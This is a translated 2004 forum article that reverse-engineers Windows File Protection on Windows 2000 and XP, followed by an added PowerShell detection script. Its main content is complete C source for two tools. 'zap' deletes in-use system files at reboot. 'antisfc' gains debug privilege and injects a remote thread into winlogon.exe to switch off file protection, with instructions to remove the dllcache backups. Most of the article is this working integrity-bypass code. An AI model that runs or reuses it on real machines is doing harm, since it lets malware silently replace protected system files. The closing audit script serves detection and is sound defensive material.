Created: 2004-02-29  Article type: original  Submitted by: bgate (bgate_at_163.com)
Author: bgate  Mail: t2di4u@hotmail.com (finding an ID that nobody has taken yet really is not an easy task)
A little preamble first. Besides, after two years on the forum I still cannot find my name in the member documents; I cannot post a featured article and I cannot reply in other people's featured threads. That counts as a miracle of sorts.
Quietly replacing system files that are in use

Two problems have to be solved: 1. Replace a file that is currently in use (open or mapped as an executable image). 2. Avoid the Windows CD dialog that Windows File Protection (WFP) pops up when a protected system file is replaced.

Microsoft ships two tools that replace in-use files, zap and inuse. Neither comes with source code, so they have to be reverse engineered. inuse is over 40K, zap is only about 7K, so zap is the one to analyze.

Open zap with IDA. There is a single core function, and its working principle turns out to be simple: the in-use file is not deleted but renamed out of the way, and the renamed copy is scheduled for deletion at the next reboot. Windows refuses to delete a file that is mapped as an executable image, but it does allow that file to be renamed, and MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT records the deletion request under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations, which the Session Manager processes at boot before the file is in use again. Because this is just a few API calls, the logic can be applied directly in our own code.
------------------- cut zap.c -----------
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/* Rename an in-use file out of the way and schedule the renamed copy
   for deletion at the next reboot (the principle recovered from zap). */
BOOL ZapDelFile(char *szFileToDel)
{
    char cTempFileName[MAX_PATH];   /* GetTempFileName needs MAX_PATH */
    char cTempPathName[MAX_PATH];
    char cFileName[MAX_PATH];

    /* Build the root directory of the drive the target lives on, "X:\".
       For a relative path, use the drive our own image was loaded from. */
    if (szFileToDel[1] == ':') {
        sprintf(cTempPathName, "%c:\\", szFileToDel[0]);
    } else {
        GetModuleFileName(NULL, cFileName, MAX_PATH);
        sprintf(cTempPathName, "%c:\\", cFileName[0]);
    }

    /* Create a uniquely named placeholder file (_@xxxx.TMP) in that root */
    if (GetTempFileName(cTempPathName, "_@", 0, cTempFileName) == 0)
        return FALSE;

    /* Rename the in-use file over the placeholder. Renaming a mapped
       image is allowed even though deleting it is refused. */
    if (MoveFileEx(szFileToDel, cTempFileName, MOVEFILE_REPLACE_EXISTING) == 0)
        return FALSE;

    /* Schedule the renamed file for deletion at reboot; the request is
       stored in PendingFileRenameOperations and executed by the Session Manager. */
    if (MoveFileEx(cTempFileName, NULL, MOVEFILE_DELAY_UNTIL_REBOOT) == 0)
        return FALSE;

    return TRUE;
}

void Usage(char *n)
{
    printf("usage: %s fileNeedToDel\n", n);
    exit(0);
}

int main(int argc, char *argv[])
{
    printf("ZAP programed by bgate. :)\n\n");
    if (argc != 2)
        Usage(argv[0]);
    if (ZapDelFile(argv[1]) == TRUE)
        printf("ok");
    else
        printf("ERROR %d", GetLastError());
    return 0;
}
------------------- end cut -----------
Now this can be used to delete a system file that is in use, but after the deletion Windows pops up the "insert the Windows CD" dialog from Windows File Protection. Note: after deleting a system file and before rebooting, the corresponding backup copy in %SystemRoot%\system32\dllcache must be removed as well, otherwise WFP will simply restore the file from it.

To get rid of that dialog I pulled out my magic weapon, Google, and found two useful pieces of information. 1. The code that implements System File Protection lives in sfc.dll on Windows 2000 and in sfc_os.dll on Windows XP. 2. Setting the SFCDisable value (a DWORD under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon) to 0xFFFFFF9D disables file protection when the system starts. The analysis below was done on Win2K SP4, sfc.dll version 5.0.2195.6673.
Open sfc.dll with IDA and search the strings for SfcDisable. At first the string was not found; the Strings window has to be set to show Unicode strings. Then locate the code that references SfcDisable:

.text:769269F9  call    _SfcQueryRegDwordWithAlternate@16 ; SfcQueryRegDwordWithAlternate(x,x,x,x)
.text:769269FE  push    ebx
.text:769269FF  push    offset ??_C@...@          ; "SfcDisable"
.text:76926A04  push    edi
.text:76926A05  push    esi
.text:76926A06  mov     _SFCDebug, eax
.text:76926A0B  call    _SfcQueryRegDwordWithAlternate@16 ; SfcQueryRegDwordWithAlternate(x,x,x,x)
.text:76926A10  push    ebx
.text:76926A11  push    offset ??_C@...@          ; "SfcScan"
.text:76926A16  push    edi
.text:76926A17  push    esi
.text:76926A18  mov     _SfcDisable, eax
.text:76926A1D  call    _SfcQueryRegDwordWithAlternate@16 ; SfcQueryRegDwordWithAlternate(x,x,x,x)
.text:76926A22  push    ebx
.text:76926A23  push    offset ??_C@...@          ; "SfcQuota"
.text:76926A28  push    edi
.text:76926A29  push    esi
.text:76926A2A  mov     _SfcScan, eax

_SfcQueryRegDwordWithAlternate@16 is the routine that reads a DWORD from the registry, and it is obvious that the SfcDisable value it reads is stored in the global _SfcDisable. So, fire up SoftICE and set a breakpoint on _SfcDisable, then use the zap we just wrote to delete a system file. SoftICE pops up. The disassembly at the break is shown below; EIP is 7692A326 and _SfcDisable is 2.

.text:7692A319  push    ecx
.text:7692A31A  and     [esp+4+var_4], 0
.text:7692A31F  cmp     _SfcDisable, 3
.text:7692A326  push    ebx
.text:7692A327  push    ebp
.text:7692A328  push    esi
.text:7692A329  push    edi
.text:7692A32A  jnz     short loc_7692A333
.text:7692A32C  xor     eax, eax
.text:7692A32E  jmp     loc_7692A459

Press F5 to let it run; a moment later the dialog appeared, so the breakpoint had fired exactly once on the way to it. Look at "cmp _SfcDisable, 3" above: if the value is not 3 execution continues at loc_7692A333 into the normal path, but if it is 3 the routine returns 0 right away. _SfcDisable was 2 at this point, so I changed it to 3 and tried deleting the system file with zap again. Luck was on my side: this time there was no CD dialog. In other words, as long as _SfcDisable is set to 3, system files can be replaced silently. However, the address differs from version to version, and poking it from SoftICE is hardly a reusable method, so I wanted a generic piece of code.

My first thought was that winlogon probably notices that a system file has been touched and calls an exported function of sfc.dll to check it; we would only need to find the entry of that export and "comment it out". Following the code backwards from the compare above, the last export reached was at 76924544. I set a breakpoint at 76924544 and deleted the file again. SoftICE did break, but not at the function entry: the break hit on the read of _SfcDisable while the function body was already executing, and the entry itself had been run long before. It seemed I had run into a skilled opponent and had to bring out the killer move: open the Windows 2000 source code :). I could not find the corresponding code there and had to go back to the disassembly, and finally found that this function sits in NtWaitForMultipleObjects...
No breakpoint on the function entry ever hits, because the entry has already run and the function never leaves its body. So the method of "commenting out" the function does not work.

At this point I figured that the function winlogon calls from sfc.dll at system start probably creates a set of events (which that waiting function then blocks on). If winlogon creates them, it should also be able to tear them down. Open winlogon with Depends. Sure enough, two functions are imported from sfc.dll. One is the one analyzed above, which creates the series of events. Look at the other one, export address 76926869: without much effort it is clear that it closes that series of events. Now all we need is to get winlogon to call this "other" function, and file protection is cancelled. But winlogon cannot simply be injected into. Issue six of 26A magazine has an article on injection, "Adjust Debugger Access Rightz to Our Process". There is also an SFCDisable article whose method searches memory for a signature and then patches it; its portability cannot be very good.

The injection method below is copied from Crazylord's code, but the method of use is not his :). I was too lazy to check it after writing, and my level is limited, so please forgive the inelegant parts.
----------------- cut antisfc.c -----------
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

typedef void (__stdcall *CLOSEEVENTS)(void);
typedef DWORD ANTISFC_ACCESS;

/** Antisfc structures */
typedef struct _ANTISFC_PROCESS {
    DWORD  pid;                  // process pid
    HANDLE processHandle;        // process handle
    char   imageName[MAX_PATH];  // image name (not full path)
} ANTISFC_PROCESS, *PANTISFC_PROCESS;

__inline void ErrorMessageBox(char *szAdditionInfo)
{
    printf("Error on %s, error code %d.\n", szAdditionInfo, GetLastError());
}

void Usage(char *n)
{
    printf("usage: %s [/d]\n", n);
    printf("\t/d: disable sfc file protect function.\n");
    exit(0);
}

/* Enable SeDebugPrivilege so that winlogon.exe can be opened with full access */
DWORD Init(void)
{
    DWORD ret = 0;
    HANDLE hToken;
    LUID seDebugNameValue;
    TOKEN_PRIVILEGES tkp;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        ErrorMessageBox("OpenProcessToken");
    } else {
        if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &seDebugNameValue)) {
            ErrorMessageBox("LookupPrivilegeValue");
        } else {
            tkp.PrivilegeCount = 1;
            tkp.Privileges[0].Luid = seDebugNameValue;
            tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, NULL))
                ErrorMessageBox("AdjustTokenPrivileges");
            else
                ret = 1;
        }
        CloseHandle(hToken);
    }
    return ret;
}

/* Find a process by image name or numeric pid; copies the image name to full_path */
DWORD GetPidEx(char *proc_name, char *full_path)
{
    DWORD dwPid;
    HANDLE hSnapshot;
    PROCESSENTRY32 pe;
    BOOL Ret;

    if (isdigit((unsigned char)proc_name[0]))
        dwPid = strtoul(proc_name, NULL, 0);
    else
        dwPid = (DWORD)-1;

    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        ErrorMessageBox("CreateToolhelp32Snapshot");
        return 0;
    }
    pe.dwSize = sizeof(PROCESSENTRY32);
    Ret = Process32First(hSnapshot, &pe);
    while (Ret) {
        if (_stricmp(pe.szExeFile, proc_name) == 0 || pe.th32ProcessID == dwPid) {
            dwPid = pe.th32ProcessID;
            strcpy(full_path, pe.szExeFile);
            break;
        }
        pe.dwSize = sizeof(PROCESSENTRY32);
        Ret = Process32Next(hSnapshot, &pe);
    }
    CloseHandle(hSnapshot);
    if (dwPid == (DWORD)-1)
        dwPid = 0;
    return dwPid;
}

DWORD InitProcess(PANTISFC_PROCESS process, char *proc_name, ANTISFC_ACCESS access)
{
    DWORD ret = 0;

    process->pid = GetPidEx(proc_name, process->imageName);
    if (process->pid != 0 && process->imageName[0] != 0) {
        process->processHandle = OpenProcess(access, FALSE, process->pid);
        if (process->processHandle == NULL)
            ErrorMessageBox("OpenProcess");
        else
            ret = 1;
    }
    return ret;
}

/* Run `function` inside the target process as a new thread and wait for it to finish */
DWORD InjectThread(PANTISFC_PROCESS process, PVOID function)
{
    HANDLE hThread;
    DWORD dwThreadPid = 0, dwState;

    hThread = CreateRemoteThread(process->processHandle, NULL, 0,
                                 (LPTHREAD_START_ROUTINE)function, NULL, 0, &dwThreadPid);
    if (hThread == NULL) {
        ErrorMessageBox("CreateRemoteThread");
        return 0;
    }
    dwState = WaitForSingleObject(hThread, 4000);   // wait up to 4 seconds
    switch (dwState) {
    case WAIT_OBJECT_0:
        break;
    case WAIT_TIMEOUT:
    case WAIT_FAILED:
    default:
        ErrorMessageBox("WaitForSingleObject");
        dwThreadPid = 0;
        break;
    }
    CloseHandle(hThread);
    return dwThreadPid;
}

int main(int argc, char *argv[])
{
    ANTISFC_PROCESS process;
    HMODULE hSfc = NULL;
    DWORD dwThread;
    CLOSEEVENTS pfnCloseEvents;
    DWORD dwVersion;

    printf("Antisfc programed by bgate. :)\n\n");
    if (argc != 2)
        Usage(argv[0]);
    if (strcmp(argv[1], "/d") != 0)
        Usage(argv[0]);

    if (Init()) {
        printf("Debug privilege set\n");
    } else {
        printf("Error on get debug privilege\n");
        return 0;
    }

    memset(&process, 0, sizeof(process));
    if (InitProcess(&process, "winlogon.exe", PROCESS_ALL_ACCESS) == 0) {
        printf("Error on get process info.\n");
        return 0;
    }

    /* Pick the DLL that holds the SFP code for this Windows version */
    dwVersion = GetVersion();
    if (LOBYTE(LOWORD(dwVersion)) == 5) {            // Windows 2000 / XP
        if (HIBYTE(LOWORD(dwVersion)) == 0) {        // Windows 2000
            hSfc = LoadLibrary("sfc.dll");
            printf("Win2000\n");
        } else {                                     // minor version 1: Windows XP
            hSfc = LoadLibrary("sfc_os.dll");
            printf("Windows XP\n");
        }
    } // else if () // 2003?
    else {
        printf("unsupported version\n");
        return 0;
    }
    if (hSfc == NULL) {
        ErrorMessageBox("LoadLibrary");
        return 0;
    }

    /* Ordinal 2 is the export winlogon uses to close the SFP events. The address
       resolved in our process is valid inside winlogon too, because system DLLs
       load at the same base in every process on these Windows versions. */
    pfnCloseEvents = (CLOSEEVENTS)GetProcAddress(hSfc, MAKEINTRESOURCE(2));
    if (pfnCloseEvents == NULL) {
        printf("Load the sfc function failed\n");
        FreeLibrary(hSfc);
        return 0;
    }
    FreeLibrary(hSfc);

    dwThread = InjectThread(&process, pfnCloseEvents);
    if (dwThread == 0)
        printf("failed\n");
    else
        printf("ok\n");

    CloseHandle(process.processHandle);
    return 0;
}
------------------ end cut ---------

Run antisfc before running zap to replace the system file; the two could also be written as one program. In theory it should work on any version of 2000 and XP (2003?), but I have only tested it on Win2K SP4 and WinXP SP1. The shortcoming of this article is that the replaced system file only takes effect after a reboot.
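The technique above leaves three traces a defender can look for: the SFCDisable value in the Winlogon key, the delayed-delete entries that zap's MoveFileEx(MOVEFILE_DELAY_UNTIL_REBOOT) call writes into PendingFileRenameOperations, and a system32 file that no longer matches its dllcache backup after the backup was left in place. The PowerShell audit below is an added example written for this edit, not code from bgate's article; the function names are my own, and the dllcache comparison only applies on 2000/XP-era systems where that directory exists (it reports the directory as absent on newer Windows).

```powershell
# Added audit example (not part of the original article). Helper names are
# hypothetical. Reads only; nothing here changes the system.

$WinlogonKey   = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$SessionMgrKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'

function Get-SfcDisableState {
    # SFCDisable is a REG_DWORD; absent or 0 means Windows File Protection is on.
    $v = (Get-ItemProperty -Path $WinlogonKey -Name SFCDisable -ErrorAction SilentlyContinue).SFCDisable
    if ($null -eq $v) { return 'SFCDisable not set (WFP enabled)' }
    # The registry provider hands back a signed Int32; view it as the DWORD it is.
    $u = [uint32]([int64]$v -band 0xFFFFFFFF)
    switch ($u) {
        0          { 'SFCDisable = 0 (WFP enabled)' }
        3          { 'SFCDisable = 3 (the value the sfc.dll check returns early on)' }
        0xFFFFFF9D { 'SFCDisable = 0xFFFFFF9D (WFP disabled at boot)' }
        default    { 'SFCDisable = 0x{0:X8} (non-default, investigate)' -f $u }
    }
}

function Get-PendingFileRenames {
    # PendingFileRenameOperations is a REG_MULTI_SZ of source/destination pairs.
    # An empty destination means "delete at boot", which is exactly what zap
    # schedules for its renamed _@xxxx.TMP copy of the original system file.
    # A leading '!' on the destination means MOVEFILE_REPLACE_EXISTING.
    $ops = (Get-ItemProperty -Path $SessionMgrKey -Name PendingFileRenameOperations `
                -ErrorAction SilentlyContinue).PendingFileRenameOperations
    if (-not $ops) { return @() }
    for ($i = 0; $i -lt $ops.Count; $i += 2) {
        $src = $ops[$i] -replace '^\\\?\?\\', ''
        $dst = if ($i + 1 -lt $ops.Count) { $ops[$i + 1] -replace '^!?\\\?\?\\', '' } else { '' }
        [pscustomobject]@{
            Source      = $src
            Destination = if ($dst) { $dst } else { '<delete at boot>' }
        }
    }
}

function Compare-DllcacheCopy {
    # WFP restores from %SystemRoot%\system32\dllcache; a protected file whose
    # system32 copy differs from the backup has been replaced without going
    # through the normal update path (or the backup was tampered with instead).
    param([Parameter(Mandatory)][string]$FileName)   # e.g. 'kernel32.dll'
    $sys32 = Join-Path $env:SystemRoot "system32\$FileName"
    $cache = Join-Path $env:SystemRoot "system32\dllcache\$FileName"
    if (-not (Test-Path $cache)) {
        return "$FileName : no dllcache copy (directory absent on Vista+ or backup removed)"
    }
    $a = (Get-FileHash -Algorithm SHA256 -Path $sys32).Hash
    $b = (Get-FileHash -Algorithm SHA256 -Path $cache).Hash
    if ($a -eq $b) { "$FileName : system32 and dllcache copies match" }
    else           { "$FileName : MISMATCH between system32 and dllcache (possible silent replacement)" }
}

Get-SfcDisableState
Get-PendingFileRenames | Format-Table -AutoSize
'kernel32.dll', 'ntdll.dll', 'winlogon.exe' | ForEach-Object { Compare-DllcacheCopy $_ }
```

Run it from an elevated prompt, because the Session Manager key and dllcache are not readable by a standard user on every configuration. A pending delete whose source is a drive-root file with a `_@` prefix and a .TMP extension, next to a system32/dllcache mismatch, is the signature of exactly the zap-then-antisfc sequence described in the article; on 2000/XP it should be checked before the next reboot, since after the reboot the renamed original is gone.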